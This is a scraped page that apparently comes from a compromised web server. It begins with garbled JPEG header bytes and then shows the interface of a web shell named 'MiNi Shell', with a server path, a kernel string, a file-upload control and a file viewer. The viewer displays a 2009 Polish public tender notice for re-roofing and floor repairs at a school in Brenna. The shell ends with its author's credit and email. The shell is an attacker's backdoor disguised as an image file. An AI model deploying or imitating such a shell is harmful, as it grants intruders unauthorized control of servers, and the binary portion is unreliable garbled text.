JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090828/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090828/141977-N-2009.html

<p class="kh_header"><b>Brenna: Wymiana pokrycia dachowego ( stara część szkoły ) oraz remont posadzek w Gimnazjum w Brennej przy ul. Góreckiej 224</b><br>
<b>Numer ogłoszenia: 141977 - 2009; data zamieszczenia: 28.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Brenna , ul. Wyzwolenia 77, 43-438 Brenna, woj. śląskie, tel. 033 8536222, faks 033 8536370.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brenna.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana pokrycia dachowego ( stara część szkoły ) oraz remont posadzek w Gimnazjum w Brennej przy ul. Góreckiej 224.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wymiana pokrycia dachowego oraz remont posadzek w budynku Gimnazjum w Brennej przy ul. Góreckiej 224.
Zakres robót:
- wymiana kilku elementów konstrukcyjnych więźby dachowej ( ok. 15 m2 deskowania dachu, ok. 20 mb krokwi ),
- zabudowa dodatkowych jętek na co 3 parze krokwi 2 x 5 x 20 cm,
- wymiana 100% łat dachowych,
- wymiana całości pokrycia dachowego,( demontaż pokrycia z płyt falistych typu onduline, wykonanie pokrycia z  blachy dachówkopodobnej ),
- montaż śniegołapów systemowych,
- montaż ław kominiarskich,
- wymiana instalacji odgromowej,
- zerwanie starych wykładzin i cokolików,
- przygotowanie podłoża,
- ułożenie wykładziny PCV ( 388,63 m2 )
Uwaga: Aktualnie na budynku Gimnazjum trwają roboty związane z termomodernizacją budynku. Roboty wykonuje Przedsiębiorstwo Produkcyjno- Usługowo-Handlowe SKID Sp. z o.o. z Pawłowic. Dlatego roboty związane z wymianą pokrycia dachowego i remontem posadzek, wykonywane muszą być w ścisłej koordynacji z tym wykonawcą.
Ponadto roboty realizowane będą na obiekcie czynnym. W klasach, w których remontowane będą posadzki, odbywają się zajęcia lekcyjne, dlatego udostępniane będą wykonawcy pojedynczo, do wyremontowania na gotowo, aby nie zakłócić prowadzenia zajęć lekcyjnych. Roboty wykonywane muszą być zatem w ścisłej koordynacji z dyrektorem placówki.
2. Przedmiot zamówienia określa dokumentacja projektowa opracowana przez INFOMARK Marek Ciućka  ul. Beskidzka 5, 44-200 Rybnik, w skład której wchodzą:
1. Projekt  wymiany pokrycia dachowego 
2. Projekt remontu posadzek 
3. Specyfikacja techniczna Wykonania i odbioru robót
4. Przedmiar robót
3. Wykonawca wykona wszelkie inne roboty towarzyszące, tymczasowe, porządkowe i zabezpieczające - niezbędne do prawidłowej realizacji przedmiotu zamówienia i funkcjonowania obiektu, w tym zaplecza budowy.
4.Wykonawca zobowiązany jest do:
- realizacji przedmiotu zamówienia zgodnie z wymogami prawa budowlanego, wiedzą i sztuką techniczną, zaleceniami jednostek uzgadniających, obowiązującymi normami technicznymi,
- wykonania wszystkich prac związanych z oznakowaniem i zabezpieczeniem terenu budowy, zgodnie z przepisami BHP,
- uporządkowania terenu najpóźniej w ciągu 14 dni po zakończeniu robót,
- usunięcia na własny koszt skutków awarii które zostały spowodowane przez Wykonawcę,
- złożenia w dwóch egzemplarzach operatu powykonawczego, zawierającego oświadczenie kierownika budowy, protokoły odbioru technicznego, dotyczące robót wszystkich występujących branż, aprobaty techniczne, wyniki pomiarów, badań, atesty, certyfikaty bezpieczeństwa,.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.26.00.00-7, 45.43.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Warunkiem udziału w postępowaniu o udzielenie zamówienia publicznego jest wniesienie wadium w wysokości 5.000,00 - zł ( słownie: pięć tysięcy zł.) przed upływem terminu do składania ofert - w pieniądzu na konto Urzędu: w Banku Spółdzielczym Skoczów Oddział Brenna  nr 71 8126 1020 0040 0002 2000 0030 
 ( za datę wniesienia wadium w pieniądzu liczy się datę wpływu pieniędzy na konto Zamawiającego). 
Ponadto wadium może być wnoszone w jednej lub kilku następujących formach:
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo -
   kredytowej , z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym.
- gwarancjach bankowych
- gwarancjach ubezpieczeniowych
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5  pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109 poz. 1158 z późn. zm.)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.Zamawiający dopuści do udziału w postępowaniu wykonawców , którzy:
1. Spełniają wymogi określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych.
2. Dysponują osobą z odpowiednimi uprawnieniami do kierowania robotami niezbędnymi w realizacji niniejszego zamówienia, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, którzy posiadają prawo pełnienia samodzielnych funkcji technicznych w budownictwie. 
3. Wykonali w okresie ostatnich 5 lat  co najmniej 2 roboty budowlane ( zakres których obejmował remont lub budowę dachu ), odpowiadające swoim rodzajem robotom budowlanym, stanowiącym przedmiot zamówienia o wartości zadania brutto nie mniejszej niż  200.000 zł. każda.
2.Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w oparciu o dokumenty wymagane w rozdziale IV niniejszej SIWZ metodą spełnia nie spełnia. Wykonawcy, którzy nie spełnią, choć jednego z w ww. warunków, zostaną wykluczeni z postępowania, a ich oferty zostaną odrzucone..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.W celu potwierdzenia spełnienia warunków stawianych wykonawcom przez zamawiającego oraz dla uznania formalnej poprawności oferta musi zawierać następujące dokumenty i oświadczenia :
1/ Formularz oferty według załączonego wzoru (załącznik nr 1).
2/  Oświadczenie, o którym mowa w art. 22 ust. 1 ustawy p.z.p. (załącznik nr 2).
3/ Kosztorys ofertowy sporządzony na podstawie  uzyskanych materiałów, podpisany przez Wykonawcę ( uproszczony lub szczegółowy ).
4/ Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
5/ Aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego o nie zaleganiu w płaceniu podatków lub zaświadczenie, że uzyskano zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego - z datą wystawienia nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
6/ Aktualne zaświadczenie właściwego oddziału ZUS potwierdzające, że Wykonawca nie zalega z opłaceniem opłat oraz składek na ubezpieczenia zdrowotne lub społeczne, lub zaświadczenie, że uzyskano zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji ZUS - z datą wystawienia nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
7/ Aktualną informację z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy oraz art. 24 ust. 1  pkt. 9 (dotyczy podmiotów zbiorowych), wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
8/ Odpis uprawnień wraz z zaświadczeniem o przynależności do właściwej izby samorządu zawodowego, osoby która pełnić będzie funkcję kierownika budowy. 
9/ Pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli Wykonawca zamierza korzystać z takich osób.
10/  Wykaz Podwykonawców oraz zgodę Podwykonawców na wykonanie określonej części zamówienia. ( załącznik nr 5 ) 
11/ Wykaz wykonanych w ciągu ostatnich pięciu lat robót budowlanych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia o wartości zamówienia brutto nie mniejszej niż 200.000 zł. ( co najmniej 2 robót budowlanych, zakres których obejmował remont lub budowę dachu ), oraz załączeniem dokumentów potwierdzających ich wykonanie, ( protokoły końcowego odbioru robót wraz z referencjami od poprzednich zamawiających). Referencje winne określać, nazwę i adres zamawiającego, nazwę zadania, wartość inwestycji brutto, okres realizacji inwestycji od - do.-  (załącznik nr 4 )
Uwaga: Zamawiający zastrzega sobie prawo sprawdzenia robót wykonanych w ciągu ostatnich pięciu lat.
12. Polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
13/ Zaakceptowany wzór umowy poprzez jego podpisanie i opieczętowanie - 
( załącznik nr 3 )
14/ W przypadku, gdy dokumenty przetargowe podpisują inne osoby niż ujawnione w rejestrach, do oferty należy dołączyć pełnomocnictwo udzielone przez osoby upoważnione, z zaznaczeniem zakresu i okresu udzielonego pełnomocnictwa. 
15/ Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu i do zawarcia umowy w sprawie zamówienia publicznego. Dokument potwierdzający ustanowienie pełnomocnika powinien zawierać: wskazanie postępowania o zamówienie publiczne, którego dotyczy, Wykonawców ubiegających się wspólnie o udzielenie zamówienia, ustanowionego pełnomocnika oraz zakres jego umocowania, a także oświadczenie o przyjęciu wspólnej, solidarnej odpowiedzialności za wykonanie lub nienależyte wykonanie zamówienia. Powinien być podpisany przez wszystkich Wykonawców ubiegających się wspólnie o zamówienie publiczne. Podpisy muszą zostać złożone przez osoby uprawnione do składania oświadczeń woli, wymienione we właściwym rejestrze lub wpisie do ewidencji działalności gospodarczej. Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z pomiotem występującym jako pełnomocnik.
Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający zażąda przed podpisaniem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców.
Dokument pełnomocnika należy przedstawić w formie oryginału .
W przypadku złożenia oferty wspólnej do oferty muszą być załączone:
- przez podmiot wiodący komplet dokumentów wymienionych w pkt 1 ppkt. 1-15  
- przez każdy z podmiotów występujących wspólnie komplet dokumentów wymienionych  w pkt. 1 ppkt. 2,4,5,6,7,12,13.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.brenna.org.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Brenna
ul. Wyzwolenia 77
43-438 Brenna.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.09.2009 godzina 10:30, miejsce: Urząd Gminy Brenna
ul. Wyzwolenia 77
43-438 Brenna
pok. 2.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com